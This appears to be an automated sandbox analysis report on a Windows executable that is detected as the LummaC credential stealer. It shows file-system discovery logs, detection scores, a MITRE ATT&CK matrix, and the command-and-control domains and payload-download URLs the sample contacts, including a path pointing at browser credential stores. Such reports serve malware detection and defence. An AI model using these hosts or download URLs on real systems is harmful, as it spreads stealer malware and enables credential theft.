Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\KATAXZVCPS	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\UMMBDNEQBN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\IPKGELNTQY	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\CURQNKVOIX	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\DVWHKMNFNN	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\GAOBCVIQIJ	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\UOOJJOZIRH	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\HTAGVDFUIE	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\RAYHIWGKDI	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents\YPSIACHYXW	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior
Source: C:\Users\user\Desktop\NAnOVCOt4L.exe	Directory queried: C:\Users\user\Documents	Jump to behavior

Source: C:\Users\user\Desktop\NAnOVCOt4L.exe

Directory queried: number of queries: 1001

Source: Yara match

File source: Process Memory Space: NAnOVCOt4L.exe PID: 7008, type: MEMORYSTR

Remote Access Functionality

Yara detected LummaC Stealer

Source: Yara match	File source: Process Memory Space: NAnOVCOt4L.exe PID: 7008, type: MEMORYSTR
Source: Yara match	File source: sslproxydump.pcap, type: PCAP
Source: Yara match	File source: decrypted.memstr, type: MEMORYSTR

Mitre Att&ck Matrix

Reconnaissance	Resource Development	Initial Access	Execution	Persistence	Privilege Escalation	Defense Evasion	Credential Access	Discovery	Lateral Movement	Collection	Command and Control	Exfiltration	Impact
Gather Victim Identity Information	Acquire Infrastructure	Valid Accounts	2 Windows Management Instrumentation	1 DLL Side-Loading	2 Process Injection	35 Virtualization/Sandbox Evasion	2 OS Credential Dumping	1 Query Registry	Remote Services	1 Archive Collected Data	11 Encrypted Channel	Exfiltration Over Other Network Medium	Abuse Accessibility Features
Credentials	Domains	Default Accounts	2 Command and Scripting Interpreter	Boot or Logon Initialization Scripts	1 DLL Side-Loading	2 Process Injection	LSASS Memory	751 Security Software Discovery	Remote Desktop Protocol	41 Data from Local System	1 Ingress Tool Transfer	Exfiltration Over Bluetooth	Network Denial of Service
Email Addresses	DNS Server	Domain Accounts	1 PowerShell	Logon Script (Windows)	Logon Script (Windows)	1 Deobfuscate/Decode Files or Information	Security Account Manager	35 Virtualization/Sandbox Evasion	SMB/Windows Admin Shares	Data from Network Shared Drive	3 Non-Application Layer Protocol	Automated Exfiltration	Data Encrypted for Impact
Employee Names	Virtual Private Server	Local Accounts	Cron	Login Hook	Login Hook	2 Obfuscated Files or Information	NTDS	2 Process Discovery	Distributed Component Object Model	Input Capture	114 Application Layer Protocol	Traffic Duplication	Data Destruction
Gather Victim Network Information	Server	Cloud Accounts	Launchd	Network Logon Script	Network Logon Script	12 Software Packing	LSA Secrets	2 File and Directory Discovery	SSH	Keylogging	Fallback Channels	Scheduled Transfer	Data Encrypted for Impact
Domain Properties	Botnet	Replication Through Removable Media	Scheduled Task	RC Scripts	RC Scripts	1 DLL Side-Loading	Cached Domain Credentials	223 System Information Discovery	VNC	GUI Input Capture	Multiband Communication	Data Transfer Size Limits	Service Stop

Behavior Graph

Hide Legend

Legend:

Process
Signature
Created File
DNS/IP Info
Is Dropped
Is Windows Process
Number of created Registry Values
Number of created Files
Visual Basic
Delphi
Java
.Net C# or VB.NET
C, C++ or other language
Is malicious
Internet

Source	Detection	Scanner	Label
NAnOVCOt4L.exe	63%	ReversingLabs	Win32.Trojan.Amadey
NAnOVCOt4L.exe	100%	Avira	TR/Crypt.TPM.Gen
NAnOVCOt4L.exe	100%	Joe Sandbox ML

Source	Detection	Scanner	Label
https://observerfry.lat:443/apis92o4p.default-release/key4.dbPK	0%	Avira URL Cloud	safe
https://observerfry.lat/pi	0%	Avira URL Cloud	safe
https://observerfry.lat/apill	0%	Avira URL Cloud	safe
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	0%	Avira URL Cloud	safe
https://observerfry.lat/b	0%	Avira URL Cloud	safe
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.n	0%	Avira URL Cloud	safe
https://observerfry.lat/apit	0%	Avira URL Cloud	safe
https://observerfry.lat:443/api	0%	Avira URL Cloud	safe
http://185.215.113.16/off/def.exeer6	0%	Avira URL Cloud	safe
https://dz8aopenkvv6s.cloudfront.net	0%	Avira URL Cloud	safe
https://observerfry.lat/apiZ	0%	Avira URL Cloud	safe
https://bbc-frontbucket-canary.prod-east.frontend.publi	0%	Avira URL Cloud	safe

Domains and IPs

Contacted Domains

Name	IP	Active	Malicious	Reputation
s3-w.us-east-1.amazonaws.com	3.5.27.149	true	false	high
bitbucket.org	185.166.143.50	true	false	high
observerfry.lat	172.67.199.72	true	false	high
bbuseruploads.s3.amazonaws.com	unknown	unknown	false	high

Contacted URLs

Name	Malicious	Reputation
curverpluch.lat	false	high
slipperyloo.lat	false	high
tentabatte.lat	false	high
manyrestro.lat	false	high
bashfulacid.lat	false	high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe	false	high
observerfry.lat	false	high
wordyfindy.lat	false	high
https://observerfry.lat/api	false	high
shapestickyr.lat	false	high
talkynicer.lat	false	high

URLs from Memory and Binaries

Name	Source	Malicious	Antivirus Detection	Reputation
https://duckduckgo.com/chrome_newtab	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3cc1-	NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BC1000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat:443/apis92o4p.default-release/key4.dbPK	NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/ac/?q=	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/apill	NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://observerfry.lat/pi	NAnOVCOt4L.exe, 00000000.00000003.1853962544.000000000152D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1871791653.000000000152D000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bridge.lga1.admarketplace.net/ctp?version=16.0.0&key=1696332238301000001.2&ci=1696332238417.	NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/	NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org:443/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeP	NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17	NAnOVCOt4L.exe, 00000000.00000003.1775576316.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1748469194.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1775397228.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1748377481.0000000005BFF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/b	NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014BD000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/	NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.stg-east.frontend.public.atl-paas.net	NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat/apit	NAnOVCOt4L.exe, 00000000.00000003.1803495068.0000000001532000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1802723716.0000000001532000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.n	NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbuseruploads.s3.amazonaws.com:443	NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://imp.mt48.net/static?id=7RHzfOIXjFEYsBdvIpkX4QqmfZfYfQfafZbXfpbWfpbX7ReNxR3UIG8zInwYIFIVs9eYi	NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net	NAnOVCOt4L.exe, 00000000.00000003.1993166637.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
http://x1.c.lencr.org/0	NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
http://x1.i.lencr.org/0	NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exe.0.0	NAnOVCOt4L.exe, 00000000.00000002.2377642265.000000000115B000.00000004.00000010.00020000.00000000.sdmp	false		high
https://support.office.com/article/94ba2e0b-638e-4a92-8857-2cb5ac1d8e17Install	NAnOVCOt4L.exe, 00000000.00000003.1748469194.0000000005BD3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/search	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://aui-cdn.atlassian.com/	NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbuseruploads.s3.amazonaws.com:443/70e84e0b-e14f-45c5-ab65-07760e9609fc/downloads/eaef3307-3	NAnOVCOt4L.exe, 00000000.00000003.2019875119.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.2020031674.000000000150B000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-websiteX-Frame-OptionsSAMEORIGINX-	NAnOVCOt4L.exe, 00000000.00000003.1993166637.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/products/firefoxgro.all	NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.amazon.com/?tag=admarketus-20&ref=pd_sl_7548d4575af019e4c148ccf1a78112802e66a0816a72fc94	NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://observerfry.lat:443/api	NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://bbuseruploads.s3.amazonaws.com/I	NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-canary.prod-east.frontend.public.atl-paas.net	NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://contile-images.services.mozilla.com/0TegrVVRalreHILhR2WvtD_CFzj13HCDcLqqpvXSOuY.10862.jpg	NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.google.com/images/branding/product/ico/googleg_lodp.ico	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://microsoft.co	NAnOVCOt4L.exe, 00000000.00000003.1746996120.000000000150A000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1832109571.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1854093448.00000000014FD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014FD000.00000004.00000020.00020000.00000000.sdmp	false		high
https://web-security-reports.services.atlassian.com/csp-report/bb-website	NAnOVCOt4L.exe, 00000000.00000002.2378096531.000000000153E000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993166637.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exeer6	NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crl.rootca1.amazontrust.com/rootca1.crl0	NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bridge.lga1.ap01.net/ctp?version=16.0.0&key=1696332238301000001.1&ci=1696332238417.12791&cta	NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	false		high
http://upx.sf.net	Amcache.hve.6.dr	false		high
https://observerfry.lat/	NAnOVCOt4L.exe, 00000000.00000003.1746946437.00000000014BD000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BAA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1871791653.000000000152D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1828273625.0000000005BA4000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1832704225.0000000005BA4000.00000004.00000800.00020000.00000000.sdmp	false		high
http://ocsp.rootca1.amazontrust.com0:	NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016	NAnOVCOt4L.exe, 00000000.00000003.1775576316.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1748469194.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1775397228.0000000005BF8000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1748377481.0000000005BFF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://nsis.sf.net/NSIS_ErrorError	NAnOVCOt4L.exe, 00000000.00000002.2380599032.00000000062A9000.00000002.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992754302.0000000005C5E000.00000004.00000800.00020000.00000000.sdmp	false		high
https://www.ecosia.org/newtab/	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://support.mozilla.org/kb/customize-firefox-controls-buttons-and-toolbars?utm_source=firefox-br	NAnOVCOt4L.exe, 00000000.00000003.1804779045.0000000005CC3000.00000004.00000800.00020000.00000000.sdmp	false		high
https://dz8aopenkvv6s.cloudfront.net	NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false	Avira URL Cloud: safe	unknown
https://ac.ecosia.org/autocomplete?q=	NAnOVCOt4L.exe, 00000000.00000003.1747781868.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747868110.0000000005BEA000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1747585176.0000000005BEC000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-canary.prod-east.frontend.publi	NAnOVCOt4L.exe	false	Avira URL Cloud: safe	unknown
https://contile-images.services.mozilla.com/obgoOYObjIFea_bXuT6L4LbBJ8j425AD87S1HMD3BWg.9991.jpg	NAnOVCOt4L.exe, 00000000.00000003.1805411907.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-frontbucket-static.prod-east.frontend.public.atl-paas.net	NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bitbucket.org/mynewworkspace123312/scnd/downloads/FormattingCharitable.exeU	NAnOVCOt4L.exe, 00000000.00000002.2377781687.00000000014A3000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.microsof	NAnOVCOt4L.exe, 00000000.00000003.1748377481.0000000005C01000.00000004.00000800.00020000.00000000.sdmp	false		high
https://cdn.cookielaw.org/	NAnOVCOt4L.exe, 00000000.00000002.2380058896.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://crt.rootca1.amazontrust.com/rootca1.cer0?	NAnOVCOt4L.exe, 00000000.00000003.1803117494.0000000005BE8000.00000004.00000800.00020000.00000000.sdmp	false		high
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/;	NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net	NAnOVCOt4L.exe, 00000000.00000003.1993166637.0000000005BB6000.00000004.00000800.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993360537.0000000001512000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1992901954.0000000005BAF000.00000004.00000800.00020000.00000000.sdmp	false		high
http://185.215.113.16/off/def.exe	NAnOVCOt4L.exe, NAnOVCOt4L.exe, 00000000.00000003.2019808994.0000000001528000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993065242.000000000151B000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000003.1993286912.000000000151D000.00000004.00000020.00020000.00000000.sdmp, NAnOVCOt4L.exe, 00000000.00000002.2378096531.0000000001529000.00000004.00000020.00020000.00000000.sdmp	false		high
https://support.office.com/article/7D48285B-20E8-4B9B-91AD-216E34163BAD?wt.mc_id=EnterPK2016Examples	NAnOVCOt4L.exe, 00000000.00000003.1748469194.0000000005BD3000.00000004.00000800.00020000.00000000.sdmp	false		high
